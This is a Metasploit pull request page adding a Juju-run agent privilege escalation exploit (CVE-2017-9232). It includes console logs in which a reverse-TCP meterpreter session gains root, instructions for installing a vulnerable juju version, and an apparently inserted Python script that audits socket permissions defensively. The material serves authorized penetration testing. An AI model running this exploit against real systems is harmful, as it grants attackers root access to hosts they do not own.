
Add Juju-run Agent Privilege Escalation module (CVE-2017-9232) #9408

Merged
merged 4 commits into from Feb 11, 2018

Conversation

@bcoles
Contributor

bcoles commented Jan 14, 2018

Add Juju-run Agent Privilege Escalation module (CVE-2017-9232).

    This module attempts to gain root privileges on Juju agent systems
    running the juju-run agent utility.

    Juju agent systems running agent tools prior to version 1.25.12,
    2.0.x before 2.0.4, and 2.1.x before 2.1.3, provide a UNIX domain socket
    to manage software ("units") without setting appropriate permissions,
    allowing unprivileged local users to execute arbitrary commands as root.

    This module has been tested successfully with Juju agent tools versions
    1.18.4, 1.25.5 and 1.25.9 on Ubuntu 14.04.1 LTS x86 deployed by Juju
    1.18.1-trusty-amd64 and 1.25.6-trusty-amd64 on Ubuntu 14.04.1 LTS x86_64.

Verification

  • Start msfconsole
  • Get a session
  • use exploit/linux/local/juju_run_agent_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Example Output

msf exploit(multi/handler) > use exploit/linux/local/juju_run_agent_priv_esc 
msf exploit(linux/local/juju_run_agent_priv_esc) > set session 1
session => 1
msf exploit(linux/local/juju_run_agent_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Trying 3 units...
[+] Unit "unit-zabbix-agent-1" uses a privileged socket
[*] Writing '/tmp/.tp9oGmPSvx' (207 bytes) ...
[*] Sending stage (857352 bytes) to 172.16.191.130
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.130:43760) at 2018-01-13 12:33:48 -0500
[+] Deleted /tmp/.tp9oGmPSvx

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.130
OS           : Ubuntu 14.04 (Linux 3.13.0-32-generic)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

Installation

The following installation instructions are for Ubuntu 14.04.1 LTS ("trusty").

# List available juju packages
apt-cache showpkg juju

# Select a vulnerable package
apt-get install juju-core=1.18.1-0ubuntu1

# Generate a config file:
juju init

# Edit the `manual` section of the newly generated config file,
# adding the appropriate `bootstrap-host` and `bootstrap-user`,
# ensuring you set the appropriate `default-series`
# (`trusty` for Ubuntu 14.x)
#   bootstrap-host: juju-client.local
#   bootstrap-user: user
#   default-series: trusty

# Switch to the `manual` environment:
juju switch manual

# Bootstrap the remote host specified above
juju bootstrap

# Once the bootstrapping is complete, check if it was successful.
# You should see a machine with ID# 0
juju stat

# Deploy a unit to the machine with ID# 0:
juju deploy zabbix-agent --to 0

# Check if it worked.
# You should see a `zabbix-agent` unit running on machine with ID# 0
# It doesn't matter if the `zabbix-agent` installation failed,
# so long as the unit is present on the remote machine.
watch juju stat

# (Optional)
# To test various versions of the juju agent utilities,
# including juju-run, the juju tools can be updated remotely.
# Note: Downgrading is more difficult.

# You may or may not need to `set-env` the upstream tools URL
juju set-env agent-metadata-url=https://streams.canonical.com/juju/tools
juju set-env agent-stream=proposed

# Be careful to select a version which exists,
# otherwise bad things will happen.
juju upgrade-juju --version 1.25.2
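The weakness the PR describes is a UNIX domain socket left accessible to unprivileged local users. The following is an added example, not code from the PR or the Metasploit module, showing how a defender can audit socket permission bits and how a daemon can bind a socket so that only its owner can connect. The socket paths are constructed in a temporary directory; the actual Juju agent socket path is not given on this page and is not assumed here.

```python
# Added example (not part of the PR or the Metasploit module): audit the
# permission bits of UNIX domain sockets and show the weak setting beside
# the hardened one. Socket paths below are constructed in a temporary
# directory; the real Juju agent socket path is not given on the page.
import os
import socket
import stat
import tempfile


def socket_exposure(path):
    """Describe who besides the owner can connect to the socket at `path`.

    Connecting to a UNIX domain socket requires write permission on the
    socket inode, so the group/other write bits are what matter here.
    Returns None when only the owner can connect.
    """
    st = os.lstat(path)
    if not stat.S_ISSOCK(st.st_mode):
        raise ValueError("%s is not a UNIX domain socket" % path)
    mode = stat.S_IMODE(st.st_mode)
    if mode & stat.S_IWOTH:
        return "world-writable: any local user can connect (mode %o)" % mode
    if mode & stat.S_IWGRP:
        return "group-writable: gid %d can connect (mode %o)" % (st.st_gid, mode)
    return None


def bind_socket(path, mode):
    """Bind a listening UNIX socket and leave it with exactly `mode`.

    The umask is narrowed before bind() so the inode never exists with
    broader bits than intended; chmod() then pins the final mode. A hardened
    daemon does both: the umask closes the window, chmod makes it explicit.
    """
    old_umask = os.umask(0o777 & ~mode)
    try:
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        sock.bind(path)
    finally:
        os.umask(old_umask)
    os.chmod(path, mode)
    sock.listen(1)
    return sock


def find_exposed_sockets(root):
    """Walk `root` and list sockets that non-owners can connect to."""
    exposed = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:  # os.walk reports sockets among the non-directory entries
            full = os.path.join(dirpath, name)
            try:
                if stat.S_ISSOCK(os.lstat(full).st_mode) and socket_exposure(full):
                    exposed.append(full)
            except OSError:
                continue
    return sorted(exposed)


def demo():
    """Create one weak (0666) and one hardened (0600) socket and audit both."""
    workdir = tempfile.mkdtemp(prefix="sockaudit-")  # constructed sample location
    weak_path = os.path.join(workdir, "weak.sock")
    hard_path = os.path.join(workdir, "hard.sock")
    weak = bind_socket(weak_path, 0o666)  # the misconfiguration class the PR describes
    hard = bind_socket(hard_path, 0o600)  # owner-only: unprivileged users cannot connect
    try:
        return {
            "weak": socket_exposure(weak_path),
            "hard": socket_exposure(hard_path),
            "exposed": [os.path.basename(p) for p in find_exposed_sockets(workdir)],
        }
    finally:
        weak.close()
        hard.close()
        os.unlink(weak_path)
        os.unlink(hard_path)
        os.rmdir(workdir)


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-8s %s" % (key, value))
```

Pointing `find_exposed_sockets` at a directory tree such as `/var/lib` or `/run` gives a quick inventory of sockets that any local user could talk to. The check reads mode bits only: POSIX ACLs, or a parent directory that non-owners cannot traverse, change the effective answer, so treat a hit as something to confirm rather than a verdict.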
bcoles added 2 commits Jan 16, 2018
@bcoles bcoles added docs and removed needs-docs labels Jan 18, 2018
@pbarry-r7 pbarry-r7 self-assigned this Jan 23, 2018
@pbarry-r7

Contributor

pbarry-r7 commented Feb 10, 2018

Verified using two Ubuntu 14.04.1 x64 VMs with Juju 1.18.1-trusty-amd64:

msfconsole -q
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.0.2.48
lhost => 10.0.2.48
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.0.2.48:4444 
[*] Sending stage (857352 bytes) to 10.0.2.49
[*] Meterpreter session 1 opened (10.0.2.48:4444 -> 10.0.2.49:49303) at 2018-02-10 14:07:43 -0500

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/linux/local/juju_run_agent_priv_esc
msf exploit(linux/local/juju_run_agent_priv_esc) > show options

Module options (exploit/linux/local/juju_run_agent_priv_esc):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   SESSION      1                yes       The session to run this module on.
   UNIT                          no        A valid Juju unit name
   WritableDir  /tmp             yes       A directory where we can write files


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.48        yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf exploit(linux/local/juju_run_agent_priv_esc) > set lport 4445
lport => 4445
msf exploit(linux/local/juju_run_agent_priv_esc) > set session 1
session => 1
msf exploit(linux/local/juju_run_agent_priv_esc) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                           Connection
  --  ----  ----                   -----------                                           ----------
  1         meterpreter x86/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ 10.0.2.49  10.0.2.48:4444 -> 10.0.2.49:49314 (10.0.2.49)

msf exploit(linux/local/juju_run_agent_priv_esc) > check
[*]  The target service is running, but could not be validated.
msf exploit(linux/local/juju_run_agent_priv_esc) > run

[*] Started reverse TCP handler on 10.0.2.48:4445 
[*] Trying 3 units...
[+] Unit "unit-zabbix-agent-0" uses a privileged socket
[*] Writing '/tmp/.upKvqB' (207 bytes) ...
[*] Sending stage (857352 bytes) to 10.0.2.49
[*] Meterpreter session 2 opened (10.0.2.48:4445 -> 10.0.2.49:58115) at 2018-02-10 14:12:48 -0500
[+] Deleted /tmp/.upKvqB


meterpreter > 
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > 

Looks good, @bcoles! I had a couple very minor tweaks I'll push and, if those look OK to you, then I'll land. Cheers!

@bcoles

Contributor Author

bcoles commented Feb 11, 2018

LGTM

@pbarry-r7 pbarry-r7 merged commit 4b6362a into rapid7:master Feb 11, 2018
1 check passed
continuous-integration/travis-ci/pr The Travis CI build passed
pbarry-r7 added a commit that referenced this pull request Feb 11, 2018
…9232)
@pbarry-r7

Contributor

pbarry-r7 commented Feb 11, 2018

Release Notes

The exploits/linux/local/juju_run_agent_priv_esc module has been added to the framework. It allows you to escalate privileges on Juju agent systems which have a vulnerable version of the juju-run utility.

@bcoles bcoles deleted the bcoles:juju_run_agent_priv_esc branch Feb 11, 2018
jmartin-r7 added a commit to jmartin-r7/metasploit-framework that referenced this pull request Feb 12, 2018
…-2017-9232)